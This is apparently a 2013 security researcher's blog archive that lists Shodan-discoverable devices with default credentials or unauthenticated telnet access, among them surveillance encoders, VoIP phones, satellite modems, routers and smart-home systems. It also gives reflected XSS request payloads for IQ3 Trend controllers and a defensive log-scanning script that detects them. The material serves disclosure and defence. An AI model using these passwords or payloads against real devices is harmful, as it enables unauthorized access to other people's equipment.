Archive for October, 2013

Verint Nextiva S1900e Series Default Unauthenticated Access

October 31, 2013

Verint Nextiva S1900e series devices (Shodan search) allow unauthenticated access to HTTP and telnet by default. According to the manual:

Designed for video monitoring and surveillance over IP networks, the Nextiva S1900e series is a highly compact, single-input or -output edge device.

Web interface:

[Screenshots: verint1, verint2]

Telnet:

df:/home/df # telnet 1.2.3.4
Trying 1.2.3.4…
Connected to 1.2.3.4.
Escape character is ‘^]’.

***********************************************************
* Verint Video Solutions S1970e VRU – 1.2.3.4 *
***********************************************************
Main Menu
———————————————————–
Menus:
1) Serial Port
2) Access Management
3) System Status
4) Network
5) Ethernet Communication
6) Advanced

Commands:
s) Save Settings
r) Reboot System
l) Load Default Configuration
q) Quit
***********************************************************
Command: !”‘^]
telnet> close
Connection closed.
df:/home/df #


Grandstream GXP VOIP Phones Default Credentials

October 30, 2013

Ran across a saved Shodan search for Grandstream GXP VOIP phones and a note about the defaults. They just use a password for authentication, not an account name: ‘admin’ works for administrator while ‘123’ works for user level. Many people seem to forget to change the default user account! The note says it works for “high-end and low-end: 1405, 1200, 2100, 280, etc.” I quickly tested these models:
GXP280 (HW0.3B)
GXP1200 (HW0.2B)
GXP2000 (HW1.1A)
GXP2000 (HW1.2B)
GXP2000 (HW2.2A)
GXP2010 (HW0.2C)

The login screen with just a password prompt:

[Screenshot: grandstream1]

User-level access gives you the status and basic settings page, but that allows you to reboot the device as well:

[Screenshots: grandstream2, grandstream3]

Comtech CDM-570/570L Satellite Modem Multiple Defaults

October 29, 2013

The Comtech CDM-570/570L Satellite Modem (Shodan search) has several defaults. According to the manual:

Read Community default = public
Write Community default = private
Trap Community default = comtech

From the saved Shodan search the notes also said these work. The manual shows the first one:

Default Name/Passwords are:
Admin comtech/comtech
Read/Write opcenter/1234
Read Only monitor/1234

LC3000 Laundry Reader Default Telnet Password

October 28, 2013

Blackboard Inc. makes a product called LC3000 Laundry Reader that may not be produced anymore. According to a manual, though, it has a default password for the telnet interface, which gets you access to interesting functions:

Log in using the default password: IPrdr4U.
The password is case sensitive. Consider changing the password.

df:/tmp # telnet 1.2.3.4
Trying 1.2.3.4…
Connected to 1.2.3.4.
Escape character is ‘^]’.

Blackboard LC3000 Configuration

Enter Password > *******

LC3000 V4.9

Command Reference –

config – Configure network parameters
showconfig – Display current configuration
status – Display reader status
ping – Ping another IP device
netstats – Display network statistics
netclear – Clear network statistics counters
password – Change config utility password
ipreboot – Reboot reader
exit – Log out of session

Type command, followed by ‘Enter’ key > showconfig

Model: LC3000

Serial Number: 5016014
MAC Address: 08-00-6a-0e-3e-8e

Communication Mode: IP

DHCP Config: Enabled
IP Address: 1.2.3.4 (via DHCP)
Subnet Mask: 255.255.255.0 (via DHCP)
Default Router/Gateway: 1.2.3.1 (via DHCP)
NP/Host IP Address: 1.2.3.4 (local)
Telnet Access: Enabled

Comment:

Volume: 6
Contrast 10
Backlight: high
Service card access: Enabled

Type command, followed by ‘Enter’ key > status

LC3000 Status:

Last power-up: 05/25/13 16:14:56
Current Time: 10/26/13 16:10:07

On-Line

Last communicated with NP/Host 6 seconds ago.

Software Versions:
LC3000IP V4.9
LCM20 V1.0
LWI V1.2

Type command, followed by ‘Enter’ key > netstats

LC3000 Network Statistics:

Last power-up: 05/25/13 16:14:56
Network counters last cleared: 05/25/13 16:14:56

Link: 100 Mbps Half duplex

Transmit Statistics:
Frames Ok………. 300038 Deferred…………. 79
Single Collisions.. 10 Late Collisions…… 0
Multiple Collisions 37 Excessive Collisions. 0
Underrun……….. 0 Carrier Lost……… 0

Receive Statistics:
Frames Ok………. 4805569 Dropped Frames……. 0
Alignment Error…. 0 CRC Error………… 0
Overrun………… 1902 Truncated………… 0
Max Frames Length.. 0 Babbling…………. 0
Bus Error………. 0

Type command, followed by ‘Enter’ key > exit

Exiting Configuration Utility . . .

Connection closed by foreign host.
df:/tmp #

Sunday Shodan Defaults

October 27, 2013

Just a few more defaults while poking around Shodan!

The Technicolor TG582n has a default according to the manual:

The default password is either blank or the ACCESS KEY printed on the label of your Technicolor Gateway. This depends on the settings chosen by your Service Provider


The Adtran ATLAS 550 manual shows it has a default. (Shodan search)

After connecting to the unit and beginning a terminal session, a login screen appears. The default password for the ATLAS 550 is (all lowercase) password.


MayGion IP cameras (Shodan search) have a default admin account of admin:admin.


According to the manual, Vivotek network cameras (Shodan search) have a persistent default administrator account name and no password protection by default:

By default, your Network Camera is not password-protected.
The administrator account name is “root”, which is permanent and can not be deleted.


According to the manual, Siemens OpenStage 40 and OpenStage 60 phones (Shodan search) have a default password for the administration menu on the phone, but it also works for the web interface: 123456

ARESCOM NetDSL Routers Unauthenticated Telnet Access

October 25, 2013

From an older saved Shodan search it looks like ARESCOM routers don’t require authentication for telnet! You can run a lot of commands, including reboot, disconnect from the ISP, and more!

Confirmed:
Model: NDS1260HE-TLI (Hardware) Version: 6.0.27 (Software version)
Model: ND1060VE-TLI (Hardware) Version: 5.3.21B (Software version)

df:~ # telnet 1.2.3.4
Trying 1.2.3.4…
Connected to 1.2.3.4.
Escape character is ‘^]’.

NDS1260HE-TLI Copyright by ARESCOM 2002

Login Success!
NetDSL>?

******* Console Help Menu *******
Available Command:

add add objects in table
connect start the connection
delete delete objects in table
disconnect disconnect modem connection
help display this menu again
quit quit the system
reboot reboot the router
reset reset the configuration, and reboot
save save the configuration
set set system parameters
show display system status
test system test
upgrade upgrade the firmware via FTP, TFTP and XMODEM

NetDSL>show sysinfo

Vendor: Arescom
Model: NDS1260HE-TLI (Hardware)
Version: 6.0.27 (Software version)
UpTime: 0293:28 (hh:mm)

NetDSL>

Cortexa Web Interface Default Credentials

October 24, 2013

Cortexa makes a smart home control system (Shodan search). According to the manual, the web interface has a default password:

You should now be at this login page. Enter admin in the User Name field, and cortexa (the default password) in lowercase letters in the Password field. Optionally click on the box to remember this password for subsequent logins with this user name. Then click OK.

CSO article about default passwords!

October 23, 2013

A few days ago Steve Ragan contacted me after my blog about why ICS-CERT is wrong about default passwords. I thought it was going to be a short article just covering my comments but he ended up talking to a lot of other researchers about the issue and they all appear to agree with me! The article is titled “Changeable default passwords are not seen as vulnerabilities by ICS-CERT, but should they be?” and hopefully brings the issue of defaults to more people!

IQ3 Trend LAN Controller – Multiple Reflected XSS

October 23, 2013

Trend Control Systems makes a series of products called IQ3 controllers running IQ3 Excite software (Manual). From a Shodan search I saw, I poked at one without authentication. By default you are given system guest access, which lets you see the status of components. Some of these pages allow for cross-site scripting (CVE-2013-78004).

1. K.htm ovrideStart Parameter Reflected XSS

GET /K.htm?ovrideStart=dfdfdf&ovrideStart=dfdfdf”><alert>(‘DF’)</script>&ovrideStart=0 HTTP/1.1
User-Agent: Opera/9.80 (Windows NT 6.1; WOW64) Presto/2.12.388 Version/12.16
Host: 1.2.3.4
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/webp, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate
Referer: http://1.2.3.4/K.htm?ovrideStart=df&ovrideStart=0
Proxy-Connection: Keep-Alive

[Screenshot: iq3-xss1]

2. Z.htm ovrideStart Parameter Reflected XSS

In addition, there are 10 sub pages in the format Z#(W).htm, one for each of 10 zones. Each of these pages has a reflected XSS in the same parameter:

http://1.2.3.4/Z2(W).htm?ovrideTitle:d=Normal%20Week”><alert>(‘DF’)</script>

3. P.htm ovrideStart Parameter Reflected XSS

4. S.htm ovrideStart Parameter Reflected XSS
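
For defenders, one way to spot this pattern in web logs. This is an added example, not code from the original post or from Trend Control Systems. It assumes combined-format access logs from a proxy in front of the controller, treats any parameter whose name starts with `ovride` as in scope, and uses constructed sample lines with harmless markup.

```python
import re
from urllib.parse import parse_qsl, unquote

# Pages the post lists as reflecting override parameters:
# K.htm, P.htm, S.htm and the per-zone Z#(W).htm pages.
PAGE_RE = re.compile(r"^/(?:[KPS]|Z\d+\(W\))\.htm$", re.IGNORECASE)
# Characters that let a reflected value break out of an HTML attribute.
MARKUP_RE = re.compile(r"[<>\"']")
# Request part of a combined-format log line (assumed log format).
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

# Constructed sample log lines (not captured traffic).
SAMPLE_LOG = [
    '10.0.0.5 - - [23/Oct/2013:10:00:01 +0000] '
    '"GET /K.htm?ovrideStart=df&ovrideStart=0 HTTP/1.1" 200 5120',
    '10.0.0.9 - - [23/Oct/2013:10:00:07 +0000] '
    '"GET /K.htm?ovrideStart=df%22%3E%3Cb%3Ex%3C%2Fb%3E&ovrideStart=0 HTTP/1.1" 200 5177',
    '10.0.0.9 - - [23/Oct/2013:10:00:09 +0000] '
    '"GET /Z2(W).htm?ovrideTitle:d=Normal%20Week%2522%253E HTTP/1.1" 200 4410',
    '10.0.0.5 - - [23/Oct/2013:10:00:12 +0000] '
    '"GET /index.htm?q=%3Cb%3E HTTP/1.1" 200 900',
]


def suspicious_requests(log_lines):
    """Return (line_number, page, parameter, decoded_value) for each hit."""
    hits = []
    for lineno, line in enumerate(log_lines, start=1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        path, _, query = match.group(1).partition("?")
        page = unquote(path)  # handles %28/%29-encoded parentheses
        if not PAGE_RE.match(page):
            continue
        for name, value in parse_qsl(query, keep_blank_values=True):
            value = unquote(value)  # second pass catches double encoding
            if name.lower().startswith("ovride") and MARKUP_RE.search(value):
                hits.append((lineno, page, name, value))
    return hits


if __name__ == "__main__":
    for hit in suspicious_requests(SAMPLE_LOG):
        print(hit)
```
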

WampServer phpinfo() Information Disclosure

October 22, 2013

Ran across a saved Shodan search for WampServer, a development platform. Without authentication it gives up all the phpinfo() information from a link on the main page:

[Screenshots: wampserver-1, wampserver-2]